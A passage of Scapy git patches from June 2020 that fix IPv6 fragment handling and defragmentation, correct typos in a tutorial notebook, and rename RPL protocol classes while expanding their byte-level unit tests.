raw(IPv6(src="fe80::1")/RPL()/DCO()/OptTgt(prefix="fd00::1", plen=128)) +assert(p == b'\x60\x00\x00\x00\x00\x1c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x07\x32\x6e\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') = RPL Base Objects dissection From f1c26e77c535598f84b01035ac8ac465def30c72 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Micha=C5=82=20Miros=C5=82aw?= Date: Wed, 3 Jun 2020 17:59:34 +0200 Subject: [PATCH 0192/1632] IPv6: disable payload detection for non-first fragments --- scapy/layers/inet6.py | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 5ad812e393a..4dbbe8d15d9 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1023,6 +1023,12 @@ class IPv6ExtHdrFragment(_IPv6ExtHdr): IntField("id", None)] overload_fields = {IPv6: {"nh": 44}} + def guess_payload_class(self, p): + if self.offset > 0: + return Raw + else: + return super(IPv6ExtHdrFragment, self).guess_payload_class(p) + def defragment6(packets): """ From ad26e8d8fbf8537f5687303291c1cce8960c5429 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Micha=C5=82=20Miros=C5=82aw?= Date: Wed, 3 Jun 2020 19:54:25 +0200 Subject: [PATCH 0193/1632] IPv6: fix defragment6() for L2 packets Replace IPv6 layer instead of reinterpreting reassembled packet always as IPv6. --- scapy/layers/inet6.py | 8 ++++++-- test/regression.uts | 5 +++++ 2 files changed, 11 insertions(+), 2 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 4dbbe8d15d9..3c61e6db160 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1073,7 +1073,7 @@ def defragment6(packets): fragmentable += raw(q.payload) # Regenerate the unfragmentable part. - q = res[0] + q = res[0].copy() nh = q[IPv6ExtHdrFragment].nh q[IPv6ExtHdrFragment].underlayer.nh = nh q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable) @@ -1081,7 +1081,11 @@ def defragment6(packets): q /= conf.raw_layer(load=fragmentable) del(q.plen) - return IPv6(raw(q)) + if q[IPv6].underlayer: + q[IPv6] = IPv6(raw(q[IPv6])) + else: + q = IPv6(raw(q)) + return q def fragment6(pkt, fragSize): diff --git a/test/regression.uts b/test/regression.uts index 00d7fa5e710..f6f64f17d63 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -4071,6 +4071,11 @@ l=fragment6(IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*40000), 1280) raw(defragment6(l)) == (b'`\x00\x00\x00\x9cT\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xe92\x00\x00' + b'A'*40000) += defragment6 - test against packets with L2 header +l=defragment6(fragment6(Ether()/IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*2000), 1280)) +Ether in l + + = defragment6 - test against a large TCP packet fragmented with a 1280 bytes MTU and missing fragments l=fragment6(IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*40000), 1280) del(l[2]) From 9eb33f323fa3bd90e854afea4c4c1c5b6b36c056 Mon Sep 17 00:00:00 2001 From: swedge Date: Thu, 4 Jun 2020 22:13:34 -0400 Subject: [PATCH 0194/1632] Fixes #2668 --- doc/notebooks/Scapy in 15 minutes.ipynb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/doc/notebooks/Scapy in 15 minutes.ipynb b/doc/notebooks/Scapy in 15 minutes.ipynb index 7735524bafd..dd273bcfce1 100644 --- a/doc/notebooks/Scapy in 15 minutes.ipynb +++ b/doc/notebooks/Scapy in 15 minutes.ipynb @@ -56,7 +56,7 @@ "cell_type": "markdown", "metadata": {}, "source": [ - "2_ Adanced firewalking using IP options is sometimes useful to perform network enumeration. Here is more complicate one-liner:" + "2_ Advanced firewalking using IP options is sometimes useful to perform network enumeration. Here is a more complicated one-liner:" ] }, { @@ -89,7 +89,7 @@ "cell_type": "markdown", "metadata": {}, "source": [ - "#### Now that, we've got your attention, let's start the tutorial !" + "#### Now that we've got your attention, let's start the tutorial !" ] }, { @@ -103,7 +103,7 @@ "cell_type": "markdown", "metadata": {}, "source": [ - "The easiest way to try Scapy is to clone the github repository, then launch the `run_scapy` script as root. The following examples can be pasted on the Scapy prompt. There is no need to install any external Python modules." + "The easiest way to try Scapy is to clone the github repository, then launch the `run_scapy` script as root. The following examples can be pasted at the Scapy prompt. There is no need to install any external Python modules." ] }, { @@ -239,7 +239,7 @@ "source": [ "There are not many differences with the previous example. However, Scapy used the specific destination to perform some magic tricks !\n", "\n", - "Using internal mechanisms (such as DNS resolution, routing table and ARP resolution), Scapy has automatically set fields necessary to send the packet. This fields can of course be accessed and displayed." + "Using internal mechanisms (such as DNS resolution, routing table and ARP resolution), Scapy has automatically set fields necessary to send the packet. These fields can of course be accessed and displayed." ] }, { @@ -334,7 +334,7 @@ "source": [ "Currently, you know how to build packets with Scapy. The next step is to send them over the network !\n", "\n", - "The `sr1()` function sends a packet and return the corresponding answer. `srp1()` does the same for layer two packets, i.e. Ethernet. If you are only interested in sending packets `send()` is your friend.\n", + "The `sr1()` function sends a packet and returns the corresponding answer. `srp1()` does the same for layer two packets, i.e. Ethernet. If you are only interested in sending packets `send()` is your friend.\n", "\n", "As an example, we can use the DNS protocol to get www.example.com IPv4 address." ] @@ -485,7 +485,7 @@ "cell_type": "markdown", "metadata": {}, "source": [ - "Sniffing the network is a straightforward as sending and receiving packets. The `sniff()` function returns a list of Scapy packets, that can be manipulated as previously described." + "Sniffing the network is as straightforward as sending and receiving packets. The `sniff()` function returns a list of Scapy packets, that can be manipulated as previously described." ] }, { From 98687b88da900540712eceee42f0120b662c916b Mon Sep 17 00:00:00 2001 From: Rahul Jadhav Date: Sat, 6 Jun 2020 23:21:36 +0800 Subject: [PATCH 0195/1632] naming conventions; dissection fixes; improved UT --- scapy/contrib/rpl.py | 84 +++++++++++++++++++---------------- scapy/contrib/rpl_metrics.py | 60 ++++++++++++------------- scapy/layers/inet6.py | 6 +-- test/contrib/rpl.uts | 85 +++++++++++++++++++++++++++--------- 4 files changed, 144 insertions(+), 91 deletions(-) diff --git a/scapy/contrib/rpl.py b/scapy/contrib/rpl.py index 4b9ead5f3e5..562f49ce9f2 100644 --- a/scapy/contrib/rpl.py +++ b/scapy/contrib/rpl.py @@ -42,7 +42,7 @@ from scapy.fields import ByteEnumField, ByteField, IP6Field, ShortField, \ BitField, BitEnumField, FieldLenField, StrLenField, IntField, \ ConditionalField -from scapy.layers.inet6 import RPL, icmp6ndraprefs, _IP6PrefixField +from scapy.layers.inet6 import ICMPv6RPL, icmp6ndraprefs, _IP6PrefixField # https://www.iana.org/assignments/rpl/rpl.xhtml#mop @@ -67,15 +67,11 @@ 10: "P2P Route Discovery"} -class _RPLGuessMsgType(Packet): - name = "Dummy RPL Message class" - - class _RPLGuessOption(Packet): name = "Dummy RPL Option class" -class OptRIO(_RPLGuessOption): +class RPLOptRIO(_RPLGuessOption): """ Control Option: Routing Information Option (RIO) """ @@ -91,7 +87,7 @@ class OptRIO(_RPLGuessOption): _IP6PrefixField("prefix", None)] -class OptDODAGConfig(_RPLGuessOption): +class RPLOptDODAGConfig(_RPLGuessOption): """ Control Option: DODAG Configuration """ @@ -112,7 +108,7 @@ class OptDODAGConfig(_RPLGuessOption): ShortField("LifetimeUnit", 0xffff)] -class OptTgt(_RPLGuessOption): +class RPLOptTgt(_RPLGuessOption): """ Control Option: RPL Target """ @@ -125,7 +121,7 @@ class OptTgt(_RPLGuessOption): _IP6PrefixField("prefix", None)] -class OptTIO(_RPLGuessOption): +class RPLOptTIO(_RPLGuessOption): """ Control Option: Transit Information Option (TIO) """ @@ -141,7 +137,7 @@ class OptTIO(_RPLGuessOption): _IP6PrefixField("parentaddr", None)] -class OptSolInfo(_RPLGuessOption): +class RPLOptSolInfo(_RPLGuessOption): """ Control Option: Solicited Information """ @@ -157,7 +153,7 @@ class OptSolInfo(_RPLGuessOption): ByteField("ver", 0)] -class OptPIO(_RPLGuessOption): +class RPLOptPIO(_RPLGuessOption): """ Control Option: Prefix Information Option (PIO) """ @@ -175,7 +171,7 @@ class OptPIO(_RPLGuessOption): IP6Field("prefix", "::1")] -class OptTgtDesc(_RPLGuessOption): +class RPLOptTgtDesc(_RPLGuessOption): """ Control Option: RPL Target Descriptor """ @@ -185,7 +181,7 @@ class OptTgtDesc(_RPLGuessOption): IntField("descriptor", 0)] -class Pad1(_RPLGuessOption): +class RPLOptPad1(_RPLGuessOption): """ Control Option: Pad 1 byte """ @@ -193,7 +189,7 @@ class Pad1(_RPLGuessOption): fields_desc = [ByteEnumField("otype", 0x00, RPLOPTSSTR)] -class PadN(_RPLGuessOption): +class RPLOptPadN(_RPLGuessOption): """ Control Option: Pad N bytes """ @@ -204,10 +200,34 @@ class PadN(_RPLGuessOption): length_from=lambda pkt: pkt.optlen)] +# https://www.iana.org/assignments/rpl/rpl.xhtml#control-message-options +RPLOPTS = {0: RPLOptPad1, + 1: RPLOptPadN, + # 2: RPLOptDAGMC, defined in rpl_metrics.py + 3: RPLOptRIO, + 4: RPLOptDODAGConfig, + 5: RPLOptTgt, + 6: RPLOptTIO, + 7: RPLOptSolInfo, + 8: RPLOptPIO, + 9: RPLOptTgtDesc} + + # RPL Control Message Handling -class DIS(_RPLGuessMsgType, _RPLGuessOption): +class _RPLGuessMsgType(Packet): + name = "Dummy RPL Message class" + + def guess_payload_class(self, payload): + if isinstance(payload, str): + otype = ord(payload[0]) + else: + otype = payload[0] + return RPLOPTS.get(otype) + + +class RPLDIS(_RPLGuessMsgType, _RPLGuessOption): """ Control Message: DODAG Information Solicitation (DIS) """ @@ -216,7 +236,7 @@ class DIS(_RPLGuessMsgType, _RPLGuessOption): ByteField("reserved", 0)] -class DIO(_RPLGuessMsgType, _RPLGuessOption): +class RPLDIO(_RPLGuessMsgType, _RPLGuessOption): """ Control Message: DODAG Information Object (DIO) """ @@ -234,7 +254,7 @@ class DIO(_RPLGuessMsgType, _RPLGuessOption): IP6Field("dodagid", "::1")] -class DAO(_RPLGuessMsgType, _RPLGuessOption): +class RPLDAO(_RPLGuessMsgType, _RPLGuessOption): """ Control Message: Destination Advertisement Object (DAO) """ @@ -249,7 +269,7 @@ class DAO(_RPLGuessMsgType, _RPLGuessOption): lambda pkt: pkt.D == 1)] -class DAOACK(_RPLGuessMsgType, _RPLGuessOption): +class RPLDAOACK(_RPLGuessMsgType, _RPLGuessOption): """ Control Message: Destination Advertisement Object Acknowledgement (DAOACK) """ @@ -264,7 +284,7 @@ class DAOACK(_RPLGuessMsgType, _RPLGuessOption): # https://datatracker.ietf.org/doc/draft-ietf-roll-efficient-npdao/ -class DCO(_RPLGuessMsgType, _RPLGuessOption): +class RPLDCO(_RPLGuessMsgType, _RPLGuessOption): """ Control Message: Destination Cleanup Object (DCO) """ @@ -280,7 +300,7 @@ class DCO(_RPLGuessMsgType, _RPLGuessOption): # https://datatracker.ietf.org/doc/draft-ietf-roll-efficient-npdao/ -class DCOACK(_RPLGuessMsgType, _RPLGuessOption): +class RPLDCOACK(_RPLGuessMsgType, _RPLGuessOption): """ Control Message: Destination Cleanup Object Acknowledgement (DCOACK) """ @@ -295,21 +315,9 @@ class DCOACK(_RPLGuessMsgType, _RPLGuessOption): # https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes -bind_layers(RPL, DIS, code=0) -bind_layers(RPL, DIO, code=1) -bind_layers(RPL, DAO, code=2) -bind_layers(RPL, DAOACK, code=3) -bind_layers(RPL, DCO, code=7) -bind_layers(RPL, DCOACK, code=8) - - -bind_layers(_RPLGuessMsgType, Pad1, otype=0) -bind_layers(_RPLGuessMsgType, PadN, otype=1) -# OptDAGMC, otype=2 defined in rpl_metric.py -bind_layers(_RPLGuessMsgType, OptRIO, otype=3) -bind_layers(_RPLGuessMsgType, OptDODAGConfig, otype=4) -bind_layers(_RPLGuessMsgType, OptTgt, otype=5) -bind_layers(_RPLGuessMsgType, OptTIO, otype=6) -bind_layers(_RPLGuessMsgType, OptSolInfo, otype=7) -bind_layers(_RPLGuessMsgType, OptPIO, otype=8) -bind_layers(_RPLGuessMsgType, OptTgtDesc, otype=9) +bind_layers(ICMPv6RPL, RPLDIS, code=0) +bind_layers(ICMPv6RPL, RPLDIO, code=1) +bind_layers(ICMPv6RPL, RPLDAO, code=2) +bind_layers(ICMPv6RPL, RPLDAOACK, code=3) +bind_layers(ICMPv6RPL, RPLDCO, code=7) +bind_layers(ICMPv6RPL, RPLDCOACK, code=8) diff --git a/scapy/contrib/rpl_metrics.py b/scapy/contrib/rpl_metrics.py index 3972d27b6bd..25e203b126e 100644 --- a/scapy/contrib/rpl_metrics.py +++ b/scapy/contrib/rpl_metrics.py @@ -34,23 +34,23 @@ import struct from scapy.compat import orb -from scapy.packet import Packet, bind_layers +from scapy.packet import Packet from scapy.fields import ByteEnumField, ByteField, ShortField, BitField, \ BitEnumField, FieldLenField, StrLenField, IntField from scapy.layers.inet6 import _PhantomAutoPadField, _OptionsField -from scapy.contrib.rpl import RPLOPTSSTR, _RPLGuessMsgType +from scapy.contrib.rpl import RPLOPTSSTR, RPLOPTS class _DAGMetricContainer(Packet): name = 'Dummy DAG Metric container' - def post_build(self, p, pay): - p += pay + def post_build(self, pkt, pay): + pkt += pay tmp_len = self.len if self.len is None: - tmp_len = len(p) - 2 - p = p[:1] + struct.pack("B", tmp_len) + p[2:] - return p + tmp_len = len(pkt) - 2 + pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:] + return pkt DAGMC_OBJTYPE = {1: "Node State and Attributes", @@ -97,16 +97,16 @@ class DAGMCObj(Packet): """ name = 'Dummy DAG MC Object' - def post_build(self, p, pay): - p += pay + def post_build(self, pkt, pay): + pkt += pay tmp_len = self.len if self.len is None: - tmp_len = len(p) - 4 - p = p[:3] + struct.pack("B", tmp_len) + p[4:] - return p + tmp_len = len(pkt) - 4 + pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:] + return pkt -class NSA(DAGMCObj): +class RPLDAGMCNSA(DAGMCObj): """ DAG Metric: Node State and Attributes """ @@ -127,7 +127,7 @@ class NSA(DAGMCObj): BitField("O", 0, 1)] -class NodeEnergy(DAGMCObj): +class RPLDAGMCNodeEnergy(DAGMCObj): """ DAG Metric: Node Energy """ @@ -149,7 +149,7 @@ class NodeEnergy(DAGMCObj): ByteField("E_E", 0)] -class HopCount(DAGMCObj): +class RPLDAGMCHopCount(DAGMCObj): """ DAG Metric: Hop Count """ @@ -169,7 +169,7 @@ class HopCount(DAGMCObj): ByteField("HopCount", 1)] -class LinkThroughput(DAGMCObj): +class RPLDAGMCLinkThroughput(DAGMCObj): """ DAG Metric: Link Throughput """ @@ -187,7 +187,7 @@ class LinkThroughput(DAGMCObj): IntField("Throughput", 1)] -class LinkLatency(DAGMCObj): +class RPLDAGMCLinkLatency(DAGMCObj): """ DAG Metric: Link Latency """ @@ -205,7 +205,7 @@ class LinkLatency(DAGMCObj): IntField("Latency", 1)] -class LinkQualityLevel(DAGMCObj): +class RPLDAGMCLinkQualityLevel(DAGMCObj): """ DAG Metric: Link Quality Level (LQL) """ @@ -225,7 +225,7 @@ class LinkQualityLevel(DAGMCObj): BitField("counter", 0, 5)] -class LinkETX(DAGMCObj): +class RPLDAGMCLinkETX(DAGMCObj): """ DAG Metric: Link ETX """ @@ -245,7 +245,7 @@ class LinkETX(DAGMCObj): # Note: Wireshark shows warning decoding LinkColor. # This seems to be wireshark issue! -class LinkColor(DAGMCObj): +class RPLDAGMCLinkColor(DAGMCObj): """ DAG Metric: Link Color """ @@ -265,17 +265,17 @@ class LinkColor(DAGMCObj): BitField("counter", 1, 6)] -DAGMC_CLS = {1: NSA, - 2: NodeEnergy, - 3: HopCount, - 4: LinkThroughput, - 5: LinkLatency, - 6: LinkQualityLevel, - 7: LinkETX, - 8: LinkColor} +DAGMC_CLS = {1: RPLDAGMCNSA, + 2: RPLDAGMCNodeEnergy, + 3: RPLDAGMCHopCount, + 4: RPLDAGMCLinkThroughput, + 5: RPLDAGMCLinkLatency, + 6: RPLDAGMCLinkQualityLevel, + 7: RPLDAGMCLinkETX, + 8: RPLDAGMCLinkColor} -class OptDAGMC(_DAGMetricContainer): +class RPLOptDAGMC(_DAGMetricContainer): """ Control Option: DAG Metric Container """ @@ -288,4 +288,4 @@ class OptDAGMC(_DAGMetricContainer): # https://www.iana.org/assignments/rpl/rpl.xhtml#control-message-options -bind_layers(_RPLGuessMsgType, OptDAGMC, otype=2) +RPLOPTS.update({2: RPLOptDAGMC}) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index bc18182e716..17ebd855709 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1203,7 +1203,7 @@ def fragment6(pkt, fragSize): 152: "ICMPv6MRD_Solicitation", 153: "ICMPv6MRD_Termination", # 154: Do Me - FMIPv6 Messages - RFC 5568 - 155: "RPL", # RFC 6550 + 155: "ICMPv6RPL", # RFC 6550 } icmp6typesminhdrlen = {1: 8, @@ -2622,11 +2622,12 @@ def _niquery_guesser(p): 8: "DCO-ACK"} -class RPL(_ICMPv6): # RFC 6550 +class ICMPv6RPL(_ICMPv6): # RFC 6550 name = 'RPL' fields_desc = [ByteEnumField("type", 155, icmp6types), ByteEnumField("code", 0, rplcodes), XShortField("cksum", None)] + overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}} ############################################################################# @@ -4024,4 +4025,3 @@ def _load_dict(d): bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6) bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP) bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE) -bind_layers(IPv6, RPL, nh=58, dst="ff02::1a") diff --git a/test/contrib/rpl.uts b/test/contrib/rpl.uts index 60c8e0151c2..d77cefc4a92 100644 --- a/test/contrib/rpl.uts +++ b/test/contrib/rpl.uts @@ -2,31 +2,64 @@ + Syntax check = Import the RPL layer -from scapy.contrib.rpl import * -from scapy.contrib.rpl_metrics import * +load_contrib("rpl") +load_contrib("rpl_metrics") + Test RPL Control Messages = RPL Base Objects construction -assert(raw(RPL()/DIS()) == b'\x9b\x00\x00\x00\x00\x00') -assert(raw(RPL()/DIO()) == b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -assert(raw(RPL()/DAO()) == b'\x9b\x02\x00\x00\x32\x00\x00\x01') -assert(raw(RPL()/DAOACK()) == b'\x9b\x03\x00\x00\x32\x00\x01\x00') -assert(raw(RPL()/DCO()) == b'\x9b\x07\x00\x00\x32\x00\x00\x01') -assert(raw(RPL()/DCOACK()) == b'\x9b\x08\x00\x00\x32\x00\x01\x00') -p=raw(IPv6(src="fe80::1")/RPL()/DCOACK()/PadN(optdata='0'*10)) +assert(raw(ICMPv6RPL()/RPLDIS()) == b'\x9b\x00\x00\x00\x00\x00') +assert(raw(ICMPv6RPL()/RPLDIO()) == b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +assert(raw(ICMPv6RPL()/RPLDAO()) == b'\x9b\x02\x00\x00\x32\x00\x00\x01') +assert(raw(ICMPv6RPL()/RPLDAOACK()) == b'\x9b\x03\x00\x00\x32\x00\x01\x00') +assert(raw(ICMPv6RPL()/RPLDCO()) == b'\x9b\x07\x00\x00\x32\x00\x00\x01') +assert(raw(ICMPv6RPL()/RPLDCOACK()) == b'\x9b\x08\x00\x00\x32\x00\x01\x00') +p=raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDCOACK()/RPLOptPadN(optdata='0'*10)) assert(p == b'\x60\x00\x00\x00\x00\x14\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x08\x42\x0f\x32\x00\x01\x00\x01\x0a\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30') -p = raw(IPv6(src="fe80::1")/RPL()/DCO()/OptTgt(prefix="fd00::1", plen=128)) +p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDCO()/RPLOptTgt(prefix="fd00::1", plen=128)) assert(p == b'\x60\x00\x00\x00\x00\x1c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x07\x32\x6e\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptRIO(plen=64, prefix="fd00::1")) +assert(p == b'\x60\x00\x00\x00\x00\x34\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\x6b\xe6\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x03\x16\x40\x00\xff\xff\xff\xff\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') + +p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO(dodagid="aaaa::1")/RPLOptDODAGConfig()/RPLOptDAGMC()/RPLDAGMCLinkETX()) +assert(p == b'\x60\x00\x00\x00\x00\x34\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xef\x1e\x32\x00\x00\x01\x88\xf0\x00\x00\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x04\x0e\x00\x14\x03\x0a\x00\x00\x01\x00\x00\x01\x00\xff\xff\xff\x02\x06\x07\x00\x00\x02\x00\x01') + +p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO(dodagid="aaaa::1")/RPLOptPIO(plen=64, prefix="fd00::1")) +assert(p == b'\x60\x00\x00\x00\x00\x3c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xbc\x2b\x32\x00\x00\x01\x88\xf0\x00\x00\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x08\x1e\x40\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') + +p = raw(IPv6(src="fe80::1", dst="fe80::2")/ICMPv6RPL()/RPLDAO()/RPLOptTgtDesc()) +assert(p == b'\x60\x00\x00\x00\x00\x0e\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x2c\xab\x32\x00\x00\x01\x09\x04\x00\x00\x00\x00') + +p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCNSA()) +assert(p == b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa9\x06\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x01\x00\x00\x02\x00\x00') + +p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCNodeEnergy()) +assert(p == b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa8\x06\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x02\x00\x00\x02\x00\x00') + +p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCHopCount()) +assert(p == b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa7\x05\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x03\x00\x00\x02\x00\x01') + +p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCLinkThroughput()) +assert(p == b'\x60\x00\x00\x00\x00\x26\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa5\xff\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x08\x04\x00\x00\x04\x00\x00\x00\x01') + +p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCLinkColor()) +assert(p == b'\x60\x00\x00\x00\x00\x25\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\x61\x03\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x07\x08\x00\x00\x03\x00\x00\x41') + +p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCLinkLatency()) +assert(p == b'\x60\x00\x00\x00\x00\x26\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa4\xff\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x08\x05\x00\x00\x04\x00\x00\x00\x01') + +p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCLinkQualityLevel()) +assert(p == b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa4\x06\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x06\x00\x00\x02\x00\x00') + = RPL Base Objects dissection # Test DIS dissection -p = RPL(b'\x9b\x00\x00\x00\x00\x00') +p = ICMPv6RPL(b'\x9b\x00\x00\x00\x00\x00') assert(p.code == 0) # Test DIO dissection -p = RPL(b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +p = ICMPv6RPL(b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') assert(p.code == 1) assert(p.RPLInstanceID == 50) assert(p.ver == 0) @@ -37,30 +70,30 @@ assert(p.dtsn == 240) assert(p.dodagid == "::1") # Test DAO dissection -p = RPL(b'\x9b\x02\x00\x00\x32\x00\x00\x01') +p = ICMPv6RPL(b'\x9b\x02\x00\x00\x32\x00\x00\x01') assert(p.code == 2) + Test RPL Control Message Options = RPL Control Options construction # DIS -assert(raw(RPL()/DIS()/Pad1()) == b'\x9b\x00\x00\x00\x00\x00\x00') +assert(raw(ICMPv6RPL()/RPLDIS()/RPLOptPad1()) == 